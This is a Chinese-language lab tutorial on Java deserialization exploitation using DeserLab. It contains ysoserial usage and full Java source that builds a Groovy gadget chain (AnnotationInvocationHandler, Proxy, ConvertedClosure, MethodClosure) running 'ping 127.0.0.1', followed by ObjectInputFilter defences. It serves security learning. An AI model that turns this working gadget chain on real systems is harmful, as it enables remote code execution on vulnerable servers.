Java反序列化漏洞利用学习与实践<\/h1>

一、Java反序列化漏洞概述<\/h2>
Java反序列化漏洞是指当应用程序反序列化不受信任的数据时，攻击者可以通过构造恶意序列化对象来执行任意代码。这类漏洞通常出现在使用Java原生序列化协议或第三方序列化框架（如XML、JSON等）的场景中。<\/p>

关键特点：<\/h3>

漏洞根源在于反序列化过程中自动调用对象的readObject()方法<\/li>
攻击者可以构造恶意对象链（gadget chains）来触发远程代码执行<\/li>

影响广泛，常见于WebLogic、WebSphere、JBoss等中间件<\/li> <\/ul>

二、实验环境搭建<\/h2>

1. 实验工具准备<\/h3>

DeserLab<\/strong>：模拟Java反序列化漏洞的实验环境

GitHub地址：https:\/\/github.com\/NickstaDB\/DeserLab<\/li> <\/ul> <\/li>
SerializationDumper<\/strong>：Java序列化数据解析工具<\/li>
jdeserialize<\/strong>：另一个Java序列化数据分析工具<\/li>
ysoserial<\/strong>：生成利用Java反序列化漏洞的payload工具<\/li> <\/ul>
2. 环境启动<\/h3>
启动DeserLab服务器和客户端：<\/p>
java -jar DeserLab.jar -server 127.0.0.1 6666<\/span> <\/span><\/span>java -jar DeserLab.jar -client 127.0.0.1 6666<\/span> <\/span><\/span><\/code><\/pre>3. 流量捕获<\/h3> 使用tcpdump捕获通信流量：<\/p> tcpdump -i lo -n -w deserlab.pcap 'port 6666'<\/span> <\/span><\/span><\/code><\/pre>三、序列化数据分析<\/h2> 1. 提取序列化数据<\/h3> 从pcap文件中提取序列化数据：<\/p> tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=<\/span>, | grep -v ',,'<\/span> | grep '^6666,'<\/span> | cut -d','<\/span> -f2 | tr '\n'<\/span> ':'<\/span> | sed s\/:\/\/g <\/span><\/span><\/code><\/pre>2. 使用SerializationDumper分析<\/h3> java -jar SerializationDumper-v1.0.jar aced00057704f000baaa77020101 <\/span><\/span><\/code><\/pre>输出示例：<\/p> STREAM_MAGIC - 0xac ed STREAM_VERSION - 0x00 05 Contents TC_BLOCKDATA - 0x77 Length - 4 - 0x04 Contents - 0xf000baaa TC_BLOCKDATA - 0x77 Length - 2 - 0x02 Contents - 0x0101 TC_OBJECT - 0x73 TC_CLASSDESC - 0x72 className Length - 20 - 0x00 14 Value - nb.deser.HashRequest - 0x6e622e64657365722e4861736852657175657374 <\/code><\/pre> 3. 使用jdeserialize分析<\/h3> java -cp jdeserialize.jar org.unsynchronized.jdeserialize rawser.bin <\/span><\/span><\/code><\/pre>四、漏洞利用实践<\/h2> 1. 使用ysoserial生成payload<\/h3> java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1'<\/span> > payload.bin <\/span><\/span><\/code><\/pre>2. 漏洞利用流程<\/h3> 建立TCP连接<\/li> 完成Java序列化握手<\/li> 发送协议特定的握手信息<\/li> 发送协议版本信息<\/li> 发送客户端名称<\/li> 发送恶意payload<\/li> <\/ol> 3. 验证漏洞利用<\/h3> 使用tcpdump验证ICMP请求：<\/p> sudo tcpdump -i lo icmp <\/span><\/span><\/code><\/pre>五、手动构造payload<\/h2> 1. 关键类分析<\/h3> sun.reflect.annotation.AnnotationInvocationHandler<\/strong>：反序列化时自动调用readObject()方法<\/li> 构造函数接受一个java.util.Map对象<\/li> <\/ul> <\/li> java.lang.reflect.Proxy<\/strong>：创建动态代理对象<\/li> 将所有方法调用路由到单一处理程序<\/li> <\/ul> <\/li> org.codehaus.groovy.runtime.ConvertedClosure<\/strong>：实现InvocationHandler接口<\/li> 用于将方法调用转换为Groovy闭包执行<\/li> <\/ul> <\/li> org.codehaus.groovy.runtime.MethodClosure<\/strong>：封装方法调用<\/li> <\/ul> <\/li> <\/ul> 2. payload构造代码<\/h3> import<\/span> java.io.IOException;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span> <\/span><\/span>import<\/span> java.util.Map;<\/span> <\/span><\/span>import<\/span> org.codehaus.groovy.runtime.ConvertedClosure;<\/span> <\/span><\/span>import<\/span> org.codehaus.groovy.runtime.MethodClosure;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> ManualPayloadGenerate<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 获取AnnotationInvocationHandler的构造函数 <\/span><\/span><\/span><\/span> String classToSerialize =<\/span> "sun.reflect.annotation.AnnotationInvocationHandler"<\/span>;<\/span> <\/span><\/span> final<\/span> Constructor<?><\/span> constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>classToSerialize)<\/span> <\/span><\/span> .<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建MethodClosure和ConvertedClosure <\/span><\/span><\/span><\/span> ConvertedClosure closure =<\/span> new<\/span> ConvertedClosure(<\/span> <\/span><\/span> new<\/span> MethodClosure(<\/span>"ping 127.0.0.1"<\/span>,<\/span> "execute"<\/span>),<\/span> "entrySet"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建动态代理Map对象 <\/span><\/span><\/span><\/span> Map map =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> ManualPayloadGenerate.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]<\/span> {<\/span>Map.<\/span>class<\/span>},<\/span> closure);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建AnnotationInvocationHandler实例 <\/span><\/span><\/span><\/span> Object instance =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> map);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 序列化对象并写入文件 <\/span><\/span><\/span><\/span> java.<\/span>io<\/span>.<\/span>ObjectOutputStream<\/span> oos =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>ObjectOutputStream<\/span>(<\/span> <\/span><\/span> new<\/span> java.<\/span>io<\/span>.<\/span>FileOutputStream<\/span>(<\/span>"payload_manual.bin"<\/span>));<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>instance);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 编译与运行<\/h3> javac -cp DeserLab\/DeserLab-v1.0\/lib\/groovy-all-2.3.9.jar ManualPayloadGenerate.java <\/span><\/span>java -cp .:DeserLab\/DeserLab-v1.0\/lib\/groovy-all-2.3.9.jar ManualPayloadGenerate > payload_manual.bin <\/span><\/span><\/code><\/pre>六、漏洞原理深入分析<\/h2> 1. 反序列化执行流程<\/h3> 反序列化过程开始读取流数据<\/li> 遇到AnnotationInvocationHandler对象时，调用其readObject方法<\/li> readObject方法调用Map对象的entrySet方法<\/li> 由于Map是动态代理对象，调用被路由到ConvertedClosure的invoke方法<\/li> ConvertedClosure将调用转发给MethodClosure<\/li> MethodClosure执行指定的命令（如"ping 127.0.0.1"）<\/li> <\/ol> 2. 关键点说明<\/h3> 自动调用机制<\/strong>：Java反序列化时会自动调用对象的readObject()方法<\/li> 代理对象<\/strong>：将方法调用路由到指定处理程序<\/li> Groovy闭包<\/strong>：提供了从Java方法调用到命令执行的桥梁<\/li> gadget chain<\/strong>：多个类的方法调用链最终导致代码执行<\/li> <\/ul> 七、防御措施<\/h2> 1. 基本防御方法<\/h3> 输入验证<\/strong>：不要反序列化不受信任的数据<\/li> 白名单机制<\/strong>：使用ObjectInputFilter限制可反序列化的类<\/li> 替换序列化机制<\/strong>：使用JSON等更安全的序列化格式<\/li> <\/ol> 2. 具体实现<\/h3> \/\/ 使用ObjectInputFilter的示例 <\/span><\/span><\/span><\/span>ObjectInputFilter filter =<\/span> info -><\/span> {<\/span> <\/span><\/span> if<\/span> (!<\/span>info.<\/span>serialClass<\/span>().<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"safe.class.Name"<\/span>))<\/span> {<\/span> <\/span><\/span> return<\/span> ObjectInputFilter.<\/span>Status<\/span>.<\/span>REJECTED<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> ObjectInputFilter.<\/span>Status<\/span>.<\/span>ALLOWED<\/span>;<\/span> <\/span><\/span>};<\/span> <\/span><\/span> <\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>inputStream);<\/span> <\/span><\/span>ois.<\/span>setObjectInputFilter<\/span>(<\/span>filter);<\/span> <\/span><\/span><\/code><\/pre>3. 其他建议<\/h3> 及时更新依赖库，修复已知漏洞<\/li> 使用安全工具扫描应用程序中的漏洞<\/li> 对反序列化操作进行严格的日志记录和监控<\/li> <\/ul> 八、扩展学习资源<\/h2> Java反序列化漏洞详解 - Nick Bloor<\/a><\/li> Java反序列化漏洞利用实战 - FoxGlove Security<\/a><\/li> Java反序列化幻灯片 - Code White<\/a><\/li> ysoserial工具源码分析<\/a><\/li> Java安全编码指南 - Oracle<\/a><\/li> <\/ol>